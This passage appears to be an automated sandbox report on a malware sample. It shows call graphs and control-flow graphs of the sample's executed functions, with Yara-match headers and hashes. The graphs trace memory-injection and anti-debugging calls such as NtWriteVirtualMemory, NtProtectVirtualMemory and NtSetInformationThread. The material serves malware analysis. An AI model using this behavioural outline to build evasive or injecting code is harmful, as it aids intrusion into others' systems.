8695->8693 8695->8694 8696 229b695 8695->8696 8811 229f3ca GetPEB 8695->8811 8696->8686 8697 229b943 NtWriteVirtualMemory 8696->8697 8698 229b9e1 8697->8698 8698->8686 8699 22a2acd 25 API calls 8698->8699 8700 229ba4c 8699->8700 8700->8686 8701 22a2acd 25 API calls 8700->8701 8702 229bb07 8701->8702 8702->8686 8703 229bb84 8702->8703 8703->8685 8704 22a2acd 25 API calls 8703->8704 8705 229bbfa 8704->8705 8705->8645 8706->8645 8708 229e44c 8707->8708 8812 229bd54 8708->8812 8710 229e451 8712 229f46b 8711->8712 8713 229f4e4 LoadLibraryA 8712->8713 8714 229fcc1 GetPEB 8712->8714 8715 229f533 8713->8715 8716 229f4c2 8714->8716 8715->8621 8716->8713 8718 229fcc1 GetPEB 8717->8718 8744 229138e 8718->8744 8719 22a1490 25 API calls 8719->8744 8720 229f4e4 LoadLibraryA 8722 229f533 8720->8722 8721 229fcc1 GetPEB 8723 229f4c2 8721->8723 8722->8645 8723->8720 8725 229bbfe 8726 22a2acd 25 API calls 8725->8726 8727 229bc5f 8726->8727 8728 22a2acd 25 API calls 8727->8728 8730 229bc72 8728->8730 8729 22a2acd 25 API calls 8729->8744 8731 22a2acd 25 API calls 8730->8731 8732 229bcba 8731->8732 8732->8645 8732->8720 8732->8721 8733 229bd4b 25 API calls 8733->8744 8734 229f3ee LoadLibraryA GetPEB 8734->8744 8735 229b695 8735->8725 8738 229b943 NtWriteVirtualMemory 8735->8738 8736 22a06a2 25 API calls 8736->8744 8737 22a14fe GetPEB 8737->8744 8740 229b9e1 8738->8740 8739 22a23e2 NtProtectVirtualMemory 8739->8744 8740->8725 8742 22a2acd 25 API calls 8740->8742 8741 2291320 8741->8645 8743 229ba4c 8742->8743 8743->8725 8745 22a2acd 25 API calls 8743->8745 8744->8719 8744->8725 8744->8729 8744->8732 8744->8733 8744->8734 8744->8735 8744->8736 8744->8737 8744->8739 8744->8741 8747 22a322b 25 API calls 8744->8747 8753 22a1f4c 8744->8753 8754 22a2284 8744->8754 8755 22a322b 25 API calls 8744->8755 8758 22a18ac 8744->8758 8909 229f3ca GetPEB 8744->8909 8746 229bb07 8745->8746 8746->8725 8748 229bb84 8746->8748 8747->8744 8748->8741 8749 22a2acd 25 API calls 8748->8749 8750 229bbfa 8749->8750 8750->8645 8751 22a23e2 NtProtectVirtualMemory 8752 22a23db 8751->8752 8752->8645 8753->8741 8759 22a23e2 NtProtectVirtualMemory 8753->8759 8754->8751 8757 22a3190 NtSetInformationThread 8755->8757 8756 22a23e2 NtProtectVirtualMemory 8756->8741 8757->8744 8758->8756 8760 22a216a 8759->8760 8760->8645 8787 229138e 8761->8787 8762 22a1490 25 API calls 8762->8787 8763 229f4e4 LoadLibraryA 8765 229f533 8763->8765 8764 229fcc1 GetPEB 8766 229f4c2 8764->8766 8765->8645 8766->8763 8768 229bbfe 8770 22a2acd 25 API calls 8768->8770 8769 229f3ee LoadLibraryA GetPEB 8769->8787 8771 229bc5f 8770->8771 8772 22a2acd 25 API calls 8771->8772 8774 229bc72 8772->8774 8773 22a2acd 25 API calls 8773->8787 8775 22a2acd 25 API calls 8774->8775 8776 229bcba 8775->8776 8776->8645 8776->8763 8776->8764 8777 229bd4b 25 API calls 8777->8787 8778 229b695 8778->8768 8781 229b943 NtWriteVirtualMemory 8778->8781 8779 22a06a2 25 API calls 8779->8787 8780 22a14fe GetPEB 8780->8787 8783 229b9e1 8781->8783 8782 22a23e2 NtProtectVirtualMemory 8782->8787 8783->8768 8785 22a2acd 25 API calls 8783->8785 8784 2291320 8784->8645 8786 229ba4c 8785->8786 8786->8768 8788 22a2acd 25 API calls 8786->8788 8787->8761 8787->8762 8787->8768 8787->8769 8787->8773 8787->8776 8787->8777 8787->8778 8787->8779 8787->8780 8787->8782 8787->8784 8790 22a322b 25 API calls 8787->8790 8796 22a1f4c 8787->8796 8797 22a2284 8787->8797 8798 22a322b 25 API calls 8787->8798 8801 22a18ac 8787->8801 8910 229f3ca GetPEB 8787->8910 8789 229bb07 8788->8789 8789->8768 8791 229bb84 8789->8791 8790->8787 8791->8784 8792 22a2acd 25 API calls 8791->8792 8793 229bbfa 8792->8793 8793->8645 8794 22a23e2 NtProtectVirtualMemory 8795 22a23db 8794->8795 8795->8645 8796->8784 8802 22a23e2 NtProtectVirtualMemory 8796->8802 8797->8794 8800 22a3190 NtSetInformationThread 8798->8800 8799 22a23e2 NtProtectVirtualMemory 8799->8784 8800->8787 8801->8799 8803 22a216a 8802->8803 8803->8645 8911 22a2ad2 8804->8911 8807 229fcdb 8806->8807 8807->8620 8809 22a2458 NtProtectVirtualMemory 8808->8809 8809->8645 8811->8695 8813 229bdb8 8812->8813 8828 229c88b 8813->8828 8815 229bdcf 8820 229bf10 8815->8820 8887 229be04 8815->8887 8819 229e672 8819->8819 8820->8819 8822 229e463 8820->8822 8897 229bf1c 8820->8897 8821 229f3ee 8823 229f4e4 LoadLibraryA 8821->8823 8824 229fcc1 GetPEB 8821->8824 8822->8821 8876 229c7b8 8822->8876 8879 229c02c 8822->8879 8825 229f533 8823->8825 8826 229f4c2 8824->8826 8825->8710 8826->8823 8829 229c8a6 8828->8829 8847 229bcba 8828->8847 8830 229f3ee 2 API calls 8829->8830 8829->8847 8835 229c9d5 8830->8835 8831 229f4e4 LoadLibraryA 8833 229f533 8831->8833 8832 229fcc1 GetPEB 8834 229f4c2 8832->8834 8833->8815 8834->8831 8837 229cb1e NtAllocateVirtualMemory 8835->8837 8859 229138e 8835->8859 8836 22a1490 24 API calls 8836->8859 8837->8847 8840 229bbfe 8841 22a2acd 24 API calls 8840->8841 8842 229bc5f 8841->8842 8843 22a2acd 24 API calls 8842->8843 8845 229bc72 8843->8845 8844 22a2acd 24 API calls 8844->8859 8846 22a2acd 24 API calls 8845->8846 8846->8847 8847->8815 8847->8831 8847->8832 8848 229bd4b 24 API calls 8848->8859 8849 229f3ee LoadLibraryA GetPEB 8849->8859 8850 229b695 8850->8840 8853 229b943 NtWriteVirtualMemory 8850->8853 8851 22a06a2 24 API calls 8851->8859 8852 22a14fe GetPEB 8852->8859 8855 229b9e1 8853->8855 8854 22a23e2 NtProtectVirtualMemory 8854->8859 8855->8840 8857 22a2acd 24 API calls 8855->8857 8856 2291320 8856->8815 8858 229ba4c 8857->8858 8858->8840 8860 22a2acd 24 API calls 8858->8860 8859->8836 8859->8840 8859->8844 8859->8847 8859->8848 8859->8849 8859->8850 8859->8851 8859->8852 8859->8854 8859->8856 8862 22a322b 24 API calls 8859->8862 8868 22a1f4c 8859->8868 8869 22a2284 8859->8869 8870 22a322b 24 API calls 8859->8870 8873 22a18ac 8859->8873 8908 229f3ca GetPEB 8859->8908 8861 229bb07 8860->8861 8861->8840 8863 229bb84 8861->8863 8862->8859 8863->8856 8864 22a2acd 24 API calls 8863->8864 8865 229bbfa 8864->8865 8865->8815 8866 22a23e2 NtProtectVirtualMemory 8867 22a23db 8866->8867 8867->8815 8868->8856 8874 22a23e2 NtProtectVirtualMemory 8868->8874 8869->8866 8872 22a3190 NtSetInformationThread 8870->8872 8871 22a23e2 NtProtectVirtualMemory 8871->8856 8872->8859 8873->8871 8875 22a216a 8874->8875 8875->8815 8877 229c88b 29 API calls 8876->8877 8878 229c7f2 8877->8878 8878->8822 8880 229c098 8879->8880 8881 229c88b 28 API calls 8880->8881 8882 229c0d9 8881->8882 8882->8822 8883 229f4e4 LoadLibraryA 8882->8883 8884 229fcc1 GetPEB 8882->8884 8885 229f533 8883->8885 8886 229f4c2 8884->8886 8885->8822 8886->8883 8888 229c88b 28 API calls 8887->8888 8895 229be29 8888->8895 8889 229f3ee 8890 229f4e4 LoadLibraryA 8889->8890 8891 229fcc1 GetPEB 8889->8891 8892 229f533 8890->8892 8893 229f4c2 8891->8893 8892->8820 8893->8890 8894 229c02c 28 API calls 8894->8895 8895->8889 8895->8894 8896 229c7b8 28 API calls 8895->8896 8896->8895 8898 229bf75 8897->8898 8899 229f3ee 8898->8899 8900 229c88b 28 API calls 8898->8900 8901 229f4e4 LoadLibraryA 8899->8901 8902 229fcc1 GetPEB 8899->8902 8906 229bfe4 8900->8906 8903 229f533 8901->8903 8904 229f4c2 8902->8904 8903->8820 8904->8901 8905 229c02c 28 API calls 8905->8906 8906->8899 8906->8905 8907 229c7b8 28 API calls 8906->8907 8907->8906 8908->8859 8909->8744 8910->8787 8943 229138e 8911->8943 8912 22a06a2 25 API calls 8912->8943 8913 229f3ee LoadLibraryA GetPEB 8913->8943 8914 22a322b 25 API calls 8914->8943 8915 22a14fe GetPEB 8915->8943 8916 22a23e2 NtProtectVirtualMemory 8916->8943 8917 22a1490 25 API calls 8917->8943 8918 22a322b 25 API calls 8919 22a3190 NtSetInformationThread 8918->8919 8919->8943 8920 22a23e2 NtProtectVirtualMemory 8921 22a23db 8920->8921 8922 229f4e4 LoadLibraryA 8924 229f533 8922->8924 8923 229fcc1 GetPEB 8925 229f4c2 8923->8925 8925->8922 8926 22a1f4c 8930 2291320 8926->8930 8932 22a23e2 NtProtectVirtualMemory 8926->8932 8927 22a2284 8927->8920 8929 22a23e2 NtProtectVirtualMemory 8929->8930 8931 22a18ac 8931->8929 8933 22a216a 8932->8933 8934 229bbfe 8935 22a2acd 25 API calls 8934->8935 8936 229bc5f 8935->8936 8937 22a2acd 25 API calls 8936->8937 8939 229bc72 8937->8939 8938 22a2acd 25 API calls 8938->8943 8940 22a2acd 25 API calls 8939->8940 8941 229bcba 8940->8941 8941->8922 8941->8923 8942 229bd4b 25 API calls 8942->8943 8943->8911 8943->8912 8943->8913 8943->8914 8943->8915 8943->8916 8943->8917 8943->8918 8943->8926 8943->8927 8943->8930 8943->8931 8943->8934 8943->8938 8943->8941 8943->8942 8944 229b695 8943->8944 8954 229f3ca GetPEB 8943->8954 8944->8934 8945 229b943 NtWriteVirtualMemory 8944->8945 8946 229b9e1 8945->8946 8946->8934 8947 22a2acd 25 API calls 8946->8947 8948 229ba4c 8947->8948 8948->8934 8949 22a2acd 25 API calls 8948->8949 8950 229bb07 8949->8950 8950->8934 8951 229bb84 8950->8951 8951->8930 8952 22a2acd 25 API calls 8951->8952 8953 229bbfa 8952->8953 8954->8943 8955 229257b 8956 2292531 8955->8956 8956->8955 8957 229fcc1 GetPEB 8956->8957 8958 22a0fcb 8957->8958 8962 22a0ff7 8958->8962 8960 22a0ff2 8961 22a0ff7 33 API calls 8960->8961 8961->8960 8963 22a1002 8962->8963 8966 22a1161 8963->8966 8965 22a12f6 8965->8960 8965->8965 8998 229138e 8966->8998 8967 22a12b3 8967->8965 8968 229f4e4 LoadLibraryA 8970 229f533 8968->8970 8969 229fcc1 GetPEB 8971 229f4c2 8969->8971 8970->8965 8971->8968 8972 229f3ee LoadLibraryA GetPEB 8972->8998 8973 22a06a2 29 API calls 8973->8998 8974 22a14fe GetPEB 8974->8998 8975 22a23e2 NtProtectVirtualMemory 8975->8998 8976 22a322b 29 API calls 8976->8998 8977 22a23e2 NtProtectVirtualMemory 8978 22a23db 8977->8978 8978->8965 8979 22a1490 29 API calls 8979->8998 8980 22a1f4c 8986 22a23e2 NtProtectVirtualMemory 8980->8986 8989 2291320 8980->8989 8981 22a2284 8981->8977 8982 22a322b 29 API calls 8984 22a3190 NtSetInformationThread 8982->8984 8983 22a23e2 NtProtectVirtualMemory 8983->8989 8984->8998 8985 22a18ac 8985->8983 8987 22a216a 8986->8987 8987->8965 8989->8965 8990 229bbfe 8991 22a2acd 29 API calls 8990->8991 8992 229bc5f 8991->8992 8993 22a2acd 29 API calls 8992->8993 8994 229bc72 8993->8994 8995 22a2acd 29 API calls 8994->8995 8996 229bcba 8995->8996 8996->8965 8996->8967 8996->8968 8996->8969 8997 229bd4b 29 API calls 8997->8998 8998->8972 8998->8973 8998->8974 8998->8975 8998->8976 8998->8979 8998->8980 8998->8981 8998->8982 8998->8985 8998->8989 8998->8990 8998->8996 8998->8997 8999 22a2acd 29 API calls 8998->8999 9000 229b695 8998->9000 9010 229f3ca GetPEB 8998->9010 8999->8998 9000->8990 9001 229b943 NtWriteVirtualMemory 9000->9001 9002 229b9e1 9001->9002 9002->8990 9003 22a2acd 29 API calls 9002->9003 9004 229ba4c 9003->9004 9004->8990 9005 22a2acd 29 API calls 9004->9005 9006 229bb07 9005->9006 9006->8990 9007 229bb84 9006->9007 9007->8989 9008 22a2acd 29 API calls 9007->9008 9009 229bbfa 9008->9009 9009->8965 9010->8998 9011 22938e2 9012 2293853 9011->9012 9013 229385e 9011->9013 9012->9013 9014 229c18f TerminateProcess 9012->9014

                                                                                                                          Executed Functions

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$Sm!|$U=b$yW^g$yW^g$}#c
                                                                                                                          • API String ID: 1029625771-3546614695
                                                                                                                          • Opcode ID: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
                                                                                                                          • Instruction ID: a5e7999bc3269b2950af3bffea668d7d1bfbea3289595030864100dc64e4db23
                                                                                                                          • Opcode Fuzzy Hash: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
                                                                                                                          • Instruction Fuzzy Hash: 04B2557161434ADFDF349E78CDA53EA37A2EF55390F95412ECC8A8B648D3358986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 316 22a06a2-22a06df call 229fcc1 319 229a574-229a80f call 22a1490 call 229a760 316->319 320 22a06e5-22a073c 316->320 343 229f3ee-229f4b1 319->343 344 229a815-229a841 319->344 324 22a3b58-22a3bea call 229f0f7 320->324 325 22a0742-22a074e 320->325 327 22a374d-22a3755 325->327 330 22a3756-22a378f 327->330 330->330 334 22a3791-22a37e0 330->334 349 229f4b3-229f4e1 call 229fcc1 call 229f542 343->349 350 229f4e4-229f4e9 LoadLibraryA 343->350 347 2291320-229136d call 22910c0 344->347 348 229a847-229a8fa 344->348 348->327 354 229a900-229aac7 call 229f3ca call 22a2acd 348->354 349->350 355 229f533-229f53d call 229f542 350->355 369 229aacd-229afd9 call 229f3ee call 22a2acd call 229bd4b call 229f313 call 22a2acd 354->369 370 229bbfe-229bd48 call 22a2acd * 3 354->370 369->370 397 229afdf-229b089 369->397 370->343 397->343 399 229b08f-229b1e5 call 22a2acd 397->399 399->347 404 229b1eb-229b20b 399->404 404->370 405 229b211-229b3f2 call 229b2fb 404->405 411 229b3f8-229b554 call 22a2acd 405->411 412 229138e-2291464 call 22a37e8 405->412 411->370 421 229b55a-229b597 411->421 422 22914dd-2291502 412->422 423 2291466-22a2adc 412->423 421->370 424 229b59d-229b604 421->424 425 2291572-2291578 422->425 426 2291517-2291518 422->426 428 22a2add-22a2b37 423->428 433 229b641-229b64a 424->433 434 229b606-229b63b 424->434 429 2291579-2291594 425->429 426->425 428->412 435 22a2b3d-22a2d65 428->435 429->426 432 2291596-22915a6 429->432 436 22915a9-22915b4 432->436 437 22915b6-22915b9 432->437 433->319 438 229b650-229b66e 433->438 434->370 434->433 435->428 460 22a2d6b-22a2de9 call 22a06a2 435->460 436->437 437->429 440 22915bb-22a15f9 call 229f3ee * 2 call 22a37e8 GetPEB call 22a23e2 437->440 438->370 441 229b674-229b68f 438->441 478 22a15ff-22a16a1 440->478 479 22a1df1-22a1e3a 440->479 441->319 442 229b695-229b8b7 call 229f944 441->442 442->370 459 229b8bd-229b99b call 22a374d NtWriteVirtualMemory 442->459 472 229b9e1-229b9ea 459->472 473 22a2dec-22a2dff 460->473 472->370 475 229b9f0-229baba call 22a2acd 472->475 473->473 476 22a2e01-22a2e89 473->476 475->370 490 229bac0-229bb82 call 22a2acd 475->490 481 22a2e8c-22a2f06 476->481 478->412 486 22a16a7-22a1838 478->486 488 22a2f08-22a2fe7 call 22a322b 481->488 499 22a183c-22a184d 486->499 508 22a31cc-22a3231 488->508 509 22a2fed-22a3091 488->509 490->370 500 229bb84-229bbde 490->500 501 22a1853-22a1863 499->501 502 22a1e40-22a1e54 499->502 500->327 507 229bbe4-229bbfd call 22a2acd 500->507 501->499 506 22a1865-22a1892 501->506 505 22a1e58-22a1e6d 502->505 510 22a2172-22a2187 505->510 511 22a1e73-22a1eac 505->511 506->499 512 22a1894-22a18aa 506->512 508->319 532 22a3237-22a3269 508->532 509->508 520 22a3097-22a30ad 509->520 510->412 518 22a218d-22a218e 510->518 511->505 516 22a1eae-22a1ec5 511->516 512->499 517 22a18ac-22a1920 512->517 516->505 521 22a1ec7-22a1f29 516->521 529 22a1922-22a199c 517->529 523 22a2192-22a21a1 518->523 520->508 527 22a30b3-22a30ca 520->527 521->505 535 22a1f2f-22a1f46 521->535 524 22a23b6-22a23dd call 22a23e2 523->524 525 22a21a7-22a2219 523->525 525->412 538 22a221f-22a222a 525->538 527->508 534 22a30d0-22a3102 527->534 536 22a1a39-22a1a4c 529->536 537 22a19a2-22a19e7 529->537 532->508 539 22a326f-22a32f4 532->539 534->508 548 22a3108-22a3161 534->548 535->412 542 22a1f4c-22a1fb8 535->542 544 22a1a69-22a1a79 536->544 545 22a1a4e-22a1a68 536->545 537->544 538->523 546 22a2230-22a2244 538->546 539->508 554 22a32fa-22a332c 539->554 550 22a1fbd-22a1fd1 542->550 552 22a1a7f-22a1a96 544->552 553 22a1c2d-22a1c44 544->553 545->544 546->523 551 22a224a-22a227e 546->551 548->508 556 22a3163-22a317d 548->556 557 22a20a7-22a20e0 550->557 558 22a1fd7-22a1ff1 550->558 551->523 559 22a2284-22a22f0 551->559 552->553 560 22a1a9c-22a1b0e 552->560 561 22a1c4a-22a1cd0 553->561 562 22a1d64-22a1da8 553->562 554->508 555 22a3332-22a3335 554->555 556->508 564 22a317f-22a31ab call 22a322b NtSetInformationThread 556->564 557->550 570 22a20e6-22a216c call 22a23e2 557->570 565 22a201c-22a2084 558->565 566 22a1ff3-22a200a 558->566 576 22a22f5-22a230e 559->576 577 22a1b0f-22a1b3f 560->577 561->562 571 22a1cd6-22a1d61 561->571 562->529 567 22a1dae-22a1dec call 22a23e2 562->567 586 22a31b0-22a31b8 564->586 565->557 566->347 573 22a2010-22a201a 566->573 567->479 571->562 573->565 581 22a2088-22a20a6 573->581 582 22a237b-22a23ae 576->582 583 22a2310-22a237a 576->583 577->577 584 22a1b41-22a1bdb 577->584 581->557 582->576 589 22a23b4 582->589 583->582 584->577 593 22a1be1-22a1c20 584->593 586->586 591 22a31ba-22a31c6 586->591 589->524 591->508 593->577 594 22a1c26-22a1c2a 593->594 594->553
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ";Jm$H+m$U=b$}#c$EK]
                                                                                                                          • API String ID: 0-2571250244
                                                                                                                          • Opcode ID: a86cf9d25562fe33b76fe462471da5fb8be8848fb057ab291227fd13d85f5952
                                                                                                                          • Instruction ID: d0f6face05315e375920b6352cfc450eb35e99dbcea15917051ecd2ba327a6ae
                                                                                                                          • Opcode Fuzzy Hash: a86cf9d25562fe33b76fe462471da5fb8be8848fb057ab291227fd13d85f5952
                                                                                                                          • Instruction Fuzzy Hash: CEA2647161434A9FDF349E788DA53DE7BA2FF55350F55822ECC8A8B648D3348986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$U=b$}#c$EK]
                                                                                                                          • API String ID: 1029625771-1197094480
                                                                                                                          • Opcode ID: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
                                                                                                                          • Instruction ID: d1ec68e43a0ce40026b042203d79788ef3b04a492b6a0fcad3c61eb422999de0
                                                                                                                          • Opcode Fuzzy Hash: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
                                                                                                                          • Instruction Fuzzy Hash: 73C2687161434A9FDF349E78CDA57EE37A2EF55390F95412ECC8A8B648D3348986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 916 22a322b-22a3231 917 229a574-229a80f call 22a1490 call 229a760 916->917 918 22a3237-22a3269 916->918 933 229f3ee-229f4b1 917->933 934 229a815-229a841 917->934 920 22a326f-22a32f4 918->920 921 22a31cc-22a3222 918->921 920->921 926 22a32fa-22a332c 920->926 921->916 926->921 927 22a3332-22a3335 926->927 938 229f4b3-229f4e1 call 229fcc1 call 229f542 933->938 939 229f4e4-229f4e9 LoadLibraryA 933->939 936 2291320-229136d call 22910c0 934->936 937 229a847-229a8fa 934->937 943 22a374d-22a3755 937->943 944 229a900-229aac7 call 229f3ca call 22a2acd 937->944 938->939 945 229f533-229f53d call 229f542 939->945 950 22a3756-22a378f 943->950 962 229aacd-229afd9 call 229f3ee call 22a2acd call 229bd4b call 229f313 call 22a2acd 944->962 963 229bbfe-229bd48 call 22a2acd * 3 944->963 950->950 954 22a3791-22a37e0 950->954 962->963 990 229afdf-229b089 962->990 963->933 990->933 992 229b08f-229b1e5 call 22a2acd 990->992 992->936 997 229b1eb-229b20b 992->997 997->963 998 229b211-229b3f2 call 229b2fb 997->998 1004 229b3f8-229b554 call 22a2acd 998->1004 1005 229138e-2291464 call 22a37e8 998->1005 1004->963 1014 229b55a-229b597 1004->1014 1015 22914dd-2291502 1005->1015 1016 2291466-22a2adc 1005->1016 1014->963 1017 229b59d-229b604 1014->1017 1018 2291572-2291578 1015->1018 1019 2291517-2291518 1015->1019 1021 22a2add-22a2b37 1016->1021 1026 229b641-229b64a 1017->1026 1027 229b606-229b63b 1017->1027 1022 2291579-2291594 1018->1022 1019->1018 1021->1005 1028 22a2b3d-22a2d65 1021->1028 1022->1019 1025 2291596-22915a6 1022->1025 1029 22915a9-22915b4 1025->1029 1030 22915b6-22915b9 1025->1030 1026->917 1031 229b650-229b66e 1026->1031 1027->963 1027->1026 1028->1021 1053 22a2d6b-22a2de9 call 22a06a2 1028->1053 1029->1030 1030->1022 1033 22915bb-22a15f9 call 229f3ee * 2 call 22a37e8 GetPEB call 22a23e2 1030->1033 1031->963 1034 229b674-229b68f 1031->1034 1071 22a15ff-22a16a1 1033->1071 1072 22a1df1-22a1e3a 1033->1072 1034->917 1035 229b695-229b815 1034->1035 1043 229b85f-229b884 call 229f944 1035->1043 1049 229b889-229b8b7 1043->1049 1049->963 1052 229b8bd-229b93e call 22a374d 1049->1052 1062 229b943-229b99b NtWriteVirtualMemory 1052->1062 1066 22a2dec-22a2dff 1053->1066 1065 229b9e1-229b9ea 1062->1065 1065->963 1068 229b9f0-229baba call 22a2acd 1065->1068 1066->1066 1069 22a2e01-22a2e89 1066->1069 1068->963 1083 229bac0-229bb82 call 22a2acd 1068->1083 1074 22a2e8c-22a2f06 1069->1074 1071->1005 1079 22a16a7-22a1838 1071->1079 1081 22a2f08-22a2fe7 call 22a322b 1074->1081 1092 22a183c-22a184d 1079->1092 1081->921 1101 22a2fed-22a3091 1081->1101 1083->963 1093 229bb84-229bbde 1083->1093 1094 22a1853-22a1863 1092->1094 1095 22a1e40-22a1e54 1092->1095 1093->943 1100 229bbe4-229bbfd call 22a2acd 1093->1100 1094->1092 1099 22a1865-22a1892 1094->1099 1098 22a1e58-22a1e6d 1095->1098 1102 22a2172-22a2187 1098->1102 1103 22a1e73-22a1eac 1098->1103 1099->1092 1104 22a1894-22a18aa 1099->1104 1101->921 1111 22a3097-22a30ad 1101->1111 1102->1005 1109 22a218d-22a218e 1102->1109 1103->1098 1107 22a1eae-22a1ec5 1103->1107 1104->1092 1108 22a18ac-22a1920 1104->1108 1107->1098 1112 22a1ec7-22a1f29 1107->1112 1119 22a1922-22a199c 1108->1119 1114 22a2192-22a21a1 1109->1114 1111->921 1117 22a30b3-22a30ca 1111->1117 1112->1098 1124 22a1f2f-22a1f46 1112->1124 1115 22a23b6-22a23dd call 22a23e2 1114->1115 1116 22a21a7-22a2219 1114->1116 1116->1005 1127 22a221f-22a222a 1116->1127 1117->921 1123 22a30d0-22a3102 1117->1123 1125 22a1a39-22a1a4c 1119->1125 1126 22a19a2-22a19e7 1119->1126 1123->921 1135 22a3108-22a3161 1123->1135 1124->1005 1130 22a1f4c-22a1fb8 1124->1130 1132 22a1a69-22a1a79 1125->1132 1133 22a1a4e-22a1a68 1125->1133 1126->1132 1127->1114 1134 22a2230-22a2244 1127->1134 1137 22a1fbd-22a1fd1 1130->1137 1139 22a1a7f-22a1a96 1132->1139 1140 22a1c2d-22a1c44 1132->1140 1133->1132 1134->1114 1138 22a224a-22a227e 1134->1138 1135->921 1141 22a3163-22a317d 1135->1141 1142 22a20a7-22a20e0 1137->1142 1143 22a1fd7-22a1ff1 1137->1143 1138->1114 1144 22a2284-22a22f0 1138->1144 1139->1140 1145 22a1a9c-22a1b0e 1139->1145 1146 22a1c4a-22a1cd0 1140->1146 1147 22a1d64-22a1da8 1140->1147 1141->921 1149 22a317f-22a318b call 22a322b 1141->1149 1142->1137 1155 22a20e6-22a216c call 22a23e2 1142->1155 1150 22a201c-22a2084 1143->1150 1151 22a1ff3-22a200a 1143->1151 1161 22a22f5-22a230e 1144->1161 1162 22a1b0f-22a1b3f 1145->1162 1146->1147 1156 22a1cd6-22a1d61 1146->1156 1147->1119 1152 22a1dae-22a1dec call 22a23e2 1147->1152 1165 22a3190-22a31ab NtSetInformationThread 1149->1165 1150->1142 1151->936 1158 22a2010-22a201a 1151->1158 1152->1072 1156->1147 1158->1150 1166 22a2088-22a20a6 1158->1166 1167 22a237b-22a23ae 1161->1167 1168 22a2310-22a237a 1161->1168 1162->1162 1169 22a1b41-22a1bdb 1162->1169 1171 22a31b0-22a31b8 1165->1171 1166->1142 1167->1161 1174 22a23b4 1167->1174 1168->1167 1169->1162 1178 22a1be1-22a1c20 1169->1178 1171->1171 1176 22a31ba-22a31c6 1171->1176 1174->1115 1176->921 1178->1162 1179 22a1c26-22a1c2a 1178->1179 1179->1140
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: H+m$U=b$}#c
                                                                                                                          • API String ID: 0-2772983987
                                                                                                                          • Opcode ID: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
                                                                                                                          • Instruction ID: 106f6bca14348da9a695ba0758586648d3b52b6ca7768ea5abd02df1b0e4bee4
                                                                                                                          • Opcode Fuzzy Hash: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
                                                                                                                          • Instruction Fuzzy Hash: FD82437161434ADFDF349E78CDA53EE3BA2EF55390F958229CC8A8B258D3748585CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1180 22a2ad2-22a2adc 1181 22a2add-22a2b37 1180->1181 1183 229138e-2291464 call 22a37e8 1181->1183 1184 22a2b3d-22a2d65 1181->1184 1194 22914dd-2291502 1183->1194 1195 2291466-2291497 1183->1195 1184->1181 1202 22a2d6b-22a2de9 call 22a06a2 1184->1202 1197 2291572-2291578 1194->1197 1198 2291517-2291518 1194->1198 1195->1180 1199 2291579-2291594 1197->1199 1198->1197 1199->1198 1201 2291596-22915a6 1199->1201 1203 22915a9-22915b4 1201->1203 1204 22915b6-22915b9 1201->1204 1210 22a2dec-22a2dff 1202->1210 1203->1204 1204->1199 1206 22915bb-22a15f9 call 229f3ee * 2 call 22a37e8 GetPEB call 22a23e2 1204->1206 1230 22a15ff-22a16a1 1206->1230 1231 22a1df1-22a1e3a 1206->1231 1210->1210 1212 22a2e01-22a2e89 1210->1212 1215 22a2e8c-22a2f06 1212->1215 1219 22a2f08-22a2fe7 call 22a322b 1215->1219 1232 22a31cc-22a3231 1219->1232 1233 22a2fed-22a3091 1219->1233 1230->1183 1238 22a16a7-22a1838 1230->1238 1244 229a574-229a80f call 22a1490 call 229a760 1232->1244 1245 22a3237-22a3269 1232->1245 1233->1232 1239 22a3097-22a30ad 1233->1239 1252 22a183c-22a184d 1238->1252 1239->1232 1242 22a30b3-22a30ca 1239->1242 1242->1232 1246 22a30d0-22a3102 1242->1246 1289 229f3ee-229f4b1 1244->1289 1290 